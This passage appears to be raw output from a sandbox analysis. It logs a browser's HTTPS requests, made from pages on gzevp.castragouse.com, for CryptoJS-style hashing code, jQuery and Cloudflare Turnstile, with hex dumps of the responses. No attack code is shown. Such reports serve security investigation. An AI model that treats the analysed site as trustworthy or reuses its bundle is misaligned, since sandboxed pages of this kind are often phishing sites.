                                                                                                                                                            Data Ascii: 535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<8|I[2]>>>2
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 2e 73 69 67 42
                                                                                                                                                            Data Ascii: ceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.words,r=t.sigB
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30
                                                                                                                                                            Data Ascii: (o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d 74 5b 65 2b 31 5d 2c 61 3d 74 5b 65
                                                                                                                                                            Data Ascii: oReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[e+1],a=t[e
                                                                                                                                                            2024-10-08 03:08:42 UTC1369INData Raw: 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31 5d 29 2c 6d 3d 44 28 6d 2c 62
                                                                                                                                                            Data Ascii: s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51]),m=D(m,b


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.549723104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:42 UTC653OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                            Referer: https://gzevp.castragouse.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:42 UTC356INHTTP/1.1 302 Found
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:42 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                            location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ed8de97f43bd-EWR


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.549722151.101.194.1374434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:42 UTC627OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                            Referer: https://gzevp.castragouse.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:42 UTC613INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 89501
                                                                                                                                                            Server: nginx
                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                            ETag: "28feccc0-15d9d"
                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:42 GMT
                                                                                                                                                            Age: 2307893
                                                                                                                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740033-EWR
                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                            X-Cache-Hits: 5889, 1
                                                                                                                                                            X-Timer: S1728356923.546793,VS0,VE2
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            2024-10-08 03:08:42 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                            2024-10-08 03:08:42 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                            2024-10-08 03:08:42 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                            2024-10-08 03:08:42 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                            2024-10-08 03:08:42 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                            2024-10-08 03:08:42 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.549725104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:08:43 UTC652OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                            Referer: https://gzevp.castragouse.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:08:43 UTC441INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:08:43 GMT
                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                            Content-Length: 47262
                                                                                                                                                            Connection: close
                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                            last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8cf2ed91caa417e9-EWR
                                                                                                                                                            2024-10-08 03:08:43 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                                                            Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                                                            Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                                                            Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                                                                            2024-10-08 03:08:43 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                                                            Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
